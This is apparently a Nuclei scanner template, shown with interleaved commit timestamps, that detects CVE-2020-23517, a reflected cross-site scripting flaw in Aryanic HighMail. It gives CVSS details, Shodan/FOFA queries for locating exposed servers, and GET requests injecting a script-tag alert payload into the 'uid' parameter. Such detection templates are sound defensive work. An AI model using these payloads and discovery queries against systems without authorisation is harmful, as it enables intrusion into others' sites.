2021-03-29 15:52:28 +00:00
id : CVE-2020-23517
info :
2022-07-03 17:22:29 +00:00
name : Aryanic HighMail (High CMS) - Cross-Site Scripting
2021-03-29 15:52:28 +00:00
author : geeknik
severity : medium
2022-04-22 10:38:41 +00:00
description : A cross-site scripting vulnerability in Aryanic HighMail (High CMS) versions 2020 and before allows remote attackers to inject arbitrary web script or HTML, via 'user' to LoginForm.
2023-09-27 15:51:13 +00:00
impact : |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
2023-09-06 12:22:36 +00:00
remediation : |
To mitigate this vulnerability, it is recommended to implement proper input validation and sanitization techniques to prevent the execution of malicious scripts.
2022-03-17 17:01:45 +00:00
reference :
- https://vulnerabilitypublishing.blogspot.com/2021/03/aryanic-highmail-high-cms-reflected.html
2022-07-03 17:22:29 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2020-23517
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 6.1
2021-09-10 11:26:40 +00:00
cve-id : CVE-2020-23517
cwe-id : CWE-79
2023-12-12 11:07:52 +00:00
epss-score : 0.00132
2024-01-14 13:49:27 +00:00
epss-percentile : 0.47953
2023-09-06 12:22:36 +00:00
cpe : cpe:2.3:a:aryanic:high_cms:*:*:*:*:*:*:*:*
2022-07-02 12:59:01 +00:00
metadata :
2023-06-04 08:13:42 +00:00
verified : true
2023-09-06 12:22:36 +00:00
max-request : 2
2023-07-11 19:49:27 +00:00
vendor : aryanic
product : high_cms
2023-09-06 12:22:36 +00:00
shodan-query : title:"HighMail"
fofa-query : title="HighMail"
2022-07-03 17:22:29 +00:00
tags : cve,cve2020,xss,cms,highmail,aryanic
2021-03-29 15:52:28 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-03-29 15:52:28 +00:00
- method : GET
path :
2022-07-02 12:59:01 +00:00
- "{{BaseURL}}/login/?uid=%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E"
2022-07-02 19:26:38 +00:00
- "{{BaseURL}}/?uid=%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E"
2021-03-29 15:52:28 +00:00
2022-07-02 19:26:38 +00:00
stop-at-first-match : true
2023-07-11 19:49:27 +00:00
2021-03-29 15:52:28 +00:00
matchers-condition : and
matchers :
- type : word
words :
2022-07-03 17:22:29 +00:00
- 'value=""><script>alert(document.domain)</script>'
2022-07-02 12:59:01 +00:00
2021-03-29 15:52:28 +00:00
- type : word
2023-07-11 19:49:27 +00:00
part : header
2021-03-29 15:52:28 +00:00
words :
2022-07-03 17:22:29 +00:00
- text/html
2022-07-02 12:59:01 +00:00
- type : status
status :
- 200
2024-01-14 14:05:19 +00:00
# digest: 490a004630440220135f20a1f99d69cfbefa26441f1b6053b0f7a7b5b7cecb55c96920ad31fc77c60220264021c8f4e9722a76ade48eca56270655022012e373bb5c50887ebfdde1fa0d:922c64590222798bb761d5b6d8e72950